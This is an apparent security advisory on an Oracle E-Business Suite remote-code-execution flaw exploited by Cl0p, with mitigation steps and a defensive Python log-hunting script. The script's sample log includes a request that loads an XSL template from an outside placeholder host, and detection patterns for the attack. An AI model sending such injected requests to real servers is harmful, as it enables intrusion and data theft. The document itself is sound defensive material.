NAVANEM
CVE-2025-61882 (exploited in the wild)

Oracle E-Business Suite, unauthenticated remote code execution (Cl0p EBS campaign)

An easily exploitable vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing (part of Oracle E-Business Suite) lets an unauthenticated attacker with HTTP network access compromise the product, resulting in takeover and remote code execution. It was exploited as a zero-day by the Cl0p extortion group for large-scale data theft.

Overview

CVE-2025-61882 is a critical, unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS), specifically the BI Publisher Integration of the Concurrent Processing component. An attacker with only HTTP network access can compromise the application and execute code without credentials. The Cl0p extortion group exploited it as a zero-day in 2025 for mass data theft, hitting numerous large enterprises before Oracle's emergency alert.

Technical Details

The flaw is reachable pre-authentication via the EBS web tier. Public analysis describes an exploit chain combining server-side request forgery and template/XSL injection in the BI Publisher integration that culminates in arbitrary code execution on the application server. Oracle released a Security Alert (outside the normal quarterly Critical Patch Update cycle) and published indicators after exploit tooling leaked. Affected versions span EBS 12.2.3 through 12.2.14.

Impact

  • Unauthenticated RCE on internet-facing or internally-reachable EBS application servers.
  • Mass data exfiltration: Cl0p used access to steal large volumes of business data for extortion.
  • ERP-wide exposure: EBS holds finance, HR, supply-chain, and customer data.
  • High-profile victims were named in the Cl0p extortion campaign, driving intense scrutiny.

Mitigation

  1. Apply Oracle's Security Alert update for CVE-2025-61882 immediately; it requires the October 2023 EBS CPU as a prerequisite baseline.
  2. Review Oracle's published IOCs (attacker IPs, file artifacts) and hunt retrospectively, since exploitation predates disclosure.
  3. Restrict EBS web-tier exposure to the internet; place it behind VPN/WAF and segment it.
  4. Rotate credentials and secrets accessible from the EBS application tier and audit for unauthorized data access.

Detection

  • Search EBS access logs for anomalous requests to BI Publisher / Concurrent Processing endpoints.
  • Match against Oracle and Rapid7 published indicators for the Cl0p campaign.
  • Investigate outbound connections from the EBS server to unknown hosts.
  • CISA added the CVE to KEV on October 6, 2025 with a ransomware-use flag.
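The first two detection bullets amount to a hunt over the EBS web-tier access log: flag requests that reach the BI Publisher / Concurrent Processing endpoints from outside the expected networks, carry template- or XSL-style parameters, or come from published indicator IPs. The following script is an added example, not Oracle's, Rapid7's or CISA's tooling. It assumes an Apache/OHS combined log format; the IOC addresses, trusted networks, sample log lines and the endpoint path fragments in the watchlist are constructed placeholders (only the `/OA_HTML/` prefix is the standard EBS web-tier path), to be replaced with the indicators in the vendor advisories.

```python
"""Hunt an EBS web-tier access log (Apache/OHS combined format) for signs of
the CVE-2025-61882 campaign. Added example; all IOC values, networks, endpoint
fragments and log lines below are constructed placeholders."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Apache/OHS combined log format: ip ident user [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed placeholder IOC source addresses (TEST-NET ranges); substitute the
# attacker IPs published by Oracle / Rapid7.
IOC_IPS = {"203.0.113.7", "198.51.100.23"}

# Networks from which EBS web-tier traffic is expected (constructed assumption).
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                ipaddress.ip_network("192.168.0.0/16")]

# /OA_HTML/ is the standard EBS web-tier prefix; the fragments are hypothetical
# stand-ins for the BI Publisher integration / Concurrent Processing endpoints.
WATCHED_PREFIX = "/oa_html/"
WATCHED_FRAGMENTS = ("bipublisher", "concurrent", "xdo")

# Heuristic: template/XSL-bearing parameters on a watched endpoint.
TEMPLATE_RE = re.compile(r"(xsl|template|stylesheet)", re.I)


@dataclass(frozen=True)
class Finding:
    line_no: int
    ip: str
    rule: str
    target: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the log fields, or None for a line not in combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_trusted(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def is_watched(path: str) -> bool:
    p = path.lower()
    return p.startswith(WATCHED_PREFIX) and any(f in p for f in WATCHED_FRAGMENTS)


def hunt(lines: List[str]) -> List[Finding]:
    """Apply the four hunt rules to each parsable line; unparsable lines are skipped."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        ip, target = rec["ip"], rec["target"]
        path, _, query = target.partition("?")
        if ip in IOC_IPS:
            findings.append(Finding(n, ip, "ioc-ip", target))
        if not is_watched(path):
            continue
        if not is_trusted(ip):
            findings.append(Finding(n, ip, "external-watched-endpoint", target))
        if TEMPLATE_RE.search(query):
            findings.append(Finding(n, ip, "template-param-on-watched-endpoint", target))
        if rec["method"] == "POST" and "Mozilla" not in rec["ua"]:
            findings.append(Finding(n, ip, "non-browser-post", target))
    return findings


# Constructed sample log: one benign login, two suspicious external requests,
# one benign internal report preview, one malformed line.
SAMPLE_LOG = [
    '10.1.2.3 - - [06/Oct/2025:09:12:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [06/Oct/2025:09:13:44 +0000] "POST /OA_HTML/bipublisher/Render HTTP/1.1" 200 812 "-" "python-requests/2.31"',
    '198.51.100.77 - - [06/Oct/2025:09:14:10 +0000] "GET /OA_HTML/concurrent/Report?template=http://203.0.113.9/t.xsl HTTP/1.1" 200 300 "-" "curl/8.0"',
    '10.5.5.5 - jsmith [06/Oct/2025:09:15:00 +0000] "GET /OA_HTML/xdo/Preview?format=pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule:38s} {f.ip:15s} {f.target}")
```

Run against a real log with `hunt(open(path).read().splitlines())`. Rules fire independently, so one request can produce several findings; in practice the IOC set, trusted networks and watched endpoints are the parts to maintain, and the template-parameter rule is a heuristic that will also catch legitimate report requests carrying a template name, so triage it together with the source address and user agent.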

Tags

cve-2025-61882, oracle, e-business-suite, cl0p, remote-code-execution, authentication-bypass, cwe-287, actively-exploited, cisa-kev, critical-vulnerability
